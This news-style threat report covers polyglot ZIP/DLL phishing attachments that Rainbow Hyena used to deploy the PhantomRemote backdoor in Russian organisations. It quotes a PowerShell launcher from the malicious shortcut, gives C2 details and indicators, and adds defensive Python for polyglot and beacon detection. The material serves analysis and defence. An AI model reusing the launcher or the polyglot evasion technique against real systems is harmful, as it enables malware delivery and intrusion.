Hackers Exploit Polyglot Files to Evade Email Filters and Deploy Malware

In late June 2025, cybersecurity teams in Russia’s healthcare and technology sectors encountered a surge of seemingly routine emails concerning logistics and contracts. These emails, appearing legitimate with familiar subject lines and trusted sender addresses, contained attachments that masqueraded as standard ZIP files but functioned as executable libraries. This deceptive technique, utilizing polyglot files—files valid in multiple formats—enabled attackers to bypass secure email gateways and directly install malware on employee workstations.

Understanding Polyglot Files

Polyglot files are crafted to be interpretable as multiple file types, depending on the application processing them. This duality allows cybercriminals to embed malicious code within files that appear benign, effectively circumventing security measures that rely on file type identification. For instance, a file may simultaneously function as a ZIP archive and a DLL (Dynamic Link Library), exploiting the way different systems handle these formats.

The Attack Mechanism

Analysts at Bi.Zone linked this attack wave to the Rainbow Hyena threat group. Each malicious attachment was a polyglot file, serving as both a PE32+ DLL and a ZIP archive. Email filters, focusing solely on the ZIP header, overlooked the embedded DLL, allowing the malicious payload to reach recipients unchecked. The attackers further enhanced the credibility of their emails by using compromised corporate mailboxes instead of spoofed domains, increasing the likelihood of recipients trusting and opening the attachments.
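As an added illustration (not code from the article or from Bi.Zone), the following Python checks an attachment the way a gateway should: it looks for a PE header at the front of the file and for a parseable ZIP central directory at its end, and flags files that satisfy both instead of trusting whichever format the leading bytes suggest. The sample polyglot is constructed here from a minimal MZ/PE stub plus a real archive; the entry name and contents are made up.

```python
import io
import struct
import zipfile

def looks_like_pe(data: bytes) -> bool:
    """True if the file starts with an MZ/PE header, i.e. something rundll32 could load."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def zip_entries(data: bytes):
    """Entry names if the file parses as a ZIP, else None. ZIP readers locate the
    end-of-central-directory record at the END of the file, so leading PE bytes
    do not stop an archive from opening."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return None

def classify(data: bytes) -> str:
    """Label by every format that matches, not just the leading magic bytes."""
    pe, names = looks_like_pe(data), zip_entries(data)
    if pe and names is not None:
        return "pe+zip polyglot"
    return "pe" if pe else ("zip" if names is not None else "other")

# --- constructed samples (not real malware) ---
def make_pe_stub() -> bytes:
    # "MZ", zero padding, e_lfanew=0x40 stored at offset 0x3C, then "PE\0\0" and filler
    return b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 60

def make_zip(entry_name: str = "contract_update.lnk") -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(entry_name, "placeholder, not a real shortcut")
    return buf.getvalue()

def make_polyglot() -> bytes:
    # PE bytes first (what a PE loader reads), archive appended (what ZIP readers find)
    return make_pe_stub() + make_zip()

if __name__ == "__main__":
    for label, blob in [("pe stub", make_pe_stub()), ("zip", make_zip()), ("polyglot", make_polyglot())]:
        print(f"{label:9s} -> {classify(blob)}, entries={zip_entries(blob)}")
```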

Upon opening the attachment, Windows treated it as a compressed folder containing a single shortcut. This shortcut, disguised with an icon resembling a contract update, executed a PowerShell script when clicked. The script searched for the polyglot file on the disk and launched it using rundll32.exe. Simultaneously, a legitimate-looking spreadsheet was extracted and opened to divert the user’s attention from the malicious activity.

Rapid Compromise and Stealthy Persistence

Telemetry data indicated that multiple organizations progressed from the initial click to full backdoor installation in under five minutes. The deployed malware, named PhantomRemote, provided the attackers with capabilities such as command execution, file download, and system inventory collection over plain HTTP. To blend into normal network traffic, PhantomRemote adopted User-Agent strings like YandexCloud/1.0 or MicrosoftAppStore/2001.0. Even after perimeter detection, the malware’s persistence mechanisms allowed the threat actors to maintain access until manual remediation was performed.

Technical Details of the Infection Process

The shortcut file contained the entire infection logic. An excerpt from the malicious LNK file revealed that the script searched for its payload and executed it as follows:

```powershell
$r=$(Get-Location).Path+'\\Договор_РН83_37_изменения.zip';
if(Test-Path $r){rundll32.exe $r,EntryPoint}else{
$f=Get-ChildItem -Path '%userprofile%' -Recurse -Filter 'Договор_РН83_37_изменения.zip' | Select-Object -First 1;
if($f){rundll32.exe $f.FullName,EntryPoint}
}
```

When rundll32.exe triggered PhantomRemote’s exported EntryPoint, the malware collected the computer and domain names, generated a GUID, and created a workspace at %PROGRAMDATA%\YandexCloud. It then communicated with the command and control (C2) server at 91.239.148[.]21/poll, sending the harvested identifiers. Subsequent C2 responses, such as `cmd:ipconfig|42`, were executed through cmd.exe, with the output returned via HTTP POST. This loop repeated every 10 seconds, with a fallback to a 1-second retry on failure, ensuring both resilience and stealth in the compromise.
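An added detection example, not from the article: it scans constructed proxy log lines for the traffic pattern described above, the reported User-Agent strings, the C2 address in the defanged form the article uses, and a steady 10-second poll interval. The log layout, the internal hosts and the timestamps are assumptions made for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Indicators from the article: the User-Agent strings PhantomRemote used and the C2 address (defanged)
SUSPECT_UA = {"YandexCloud/1.0", "MicrosoftAppStore/2001.0"}
KNOWN_C2 = {"91.239.148[.]21"}

# Assumed proxy log layout: <iso-time> <src> <dst> <method> <path> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (GET|POST) (\S+) "([^"]*)"$')

def parse(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, src, dst, method, path, ua = m.groups()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst, "method": method, "path": path, "ua": ua}

def find_beacons(lines, period=10.0, tolerance=1.0, min_hits=4):
    """Map (src, dst) -> reasons for flows matching the PhantomRemote pattern: a suspect
    User-Agent, the known C2 address, or requests spaced a steady ~period seconds apart."""
    flows = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        flows[(rec["src"], rec["dst"])].append(rec)
    alerts = {}
    for (src, dst), recs in flows.items():
        reasons = []
        if {r["ua"] for r in recs} & SUSPECT_UA:
            reasons.append("suspect user-agent")
        if dst in KNOWN_C2:
            reasons.append("known C2 address")
        times = sorted(r["ts"] for r in recs)
        if len(times) >= min_hits:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            if abs(mean(gaps) - period) <= tolerance and pstdev(gaps) <= tolerance:
                reasons.append(f"regular ~{period:.0f}s polling")
        if reasons:
            alerts[(src, dst)] = reasons
    return alerts

# Constructed log lines: one host polling /poll every 10 s, one host browsing normally
SAMPLE_LOG = """\
2025-06-26T10:00:00 10.0.0.5 91.239.148[.]21 GET /poll "YandexCloud/1.0"
2025-06-26T10:00:10 10.0.0.5 91.239.148[.]21 GET /poll "YandexCloud/1.0"
2025-06-26T10:00:20 10.0.0.5 91.239.148[.]21 POST /poll "YandexCloud/1.0"
2025-06-26T10:00:30 10.0.0.5 91.239.148[.]21 GET /poll "YandexCloud/1.0"
2025-06-26T10:00:03 10.0.0.7 203.0.113.9 GET /index.html "Mozilla/5.0"
""".splitlines()
```

Calling `find_beacons(SAMPLE_LOG)` flags only the 10.0.0.5 flow, with all three reasons; the browsing host produces no alert.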

Broader Implications and Similar Techniques

The use of polyglot files in cyberattacks is not an isolated incident. A study titled On the Abuse and Detection of Polyglot Files highlighted that existing file-format and embedded-file detection tools often fail to reliably detect polyglot files used in the wild, leaving organizations vulnerable to attack. The study found 30 polyglot samples and 15 attack chains leveraging polyglot files, underscoring the sophistication of such techniques.

In another instance, a threat actor used polyglot files to conceal the installation of a new backdoor as part of a spear-phishing campaign targeting firms in the United Arab Emirates, particularly in the aviation, satellite communications, and transportation sectors. The backdoor, dubbed Sosano, was discovered by researchers at Proofpoint with assistance from PwC’s Threat Intelligence team. The attackers first compromised the email account of an Indian electronics company, then used that access to send email messages with malicious links leading to ZIP files containing polyglot files to obfuscate payload content.

Recommendations for Mitigation

To defend against such sophisticated attacks, organizations should consider the following measures:

1. Advanced Email Filtering: Implement email security solutions capable of analyzing the content and structure of attachments beyond standard file type checks.

2. User Education: Train employees to recognize suspicious emails and avoid opening unexpected attachments, even from seemingly legitimate sources.

3. Endpoint Detection and Response (EDR): Deploy EDR solutions to monitor and respond to suspicious activities on endpoints, providing an additional layer of security.

4. Regular Software Updates: Ensure that all systems and software are up to date with the latest security patches to mitigate vulnerabilities that could be exploited by such attacks.

5. Network Traffic Analysis: Monitor network traffic for unusual patterns or communications with known malicious IP addresses, which can indicate a compromise.

By adopting a multi-layered security approach and staying informed about emerging threats like polyglot file attacks, organizations can enhance their resilience against sophisticated cyber threats.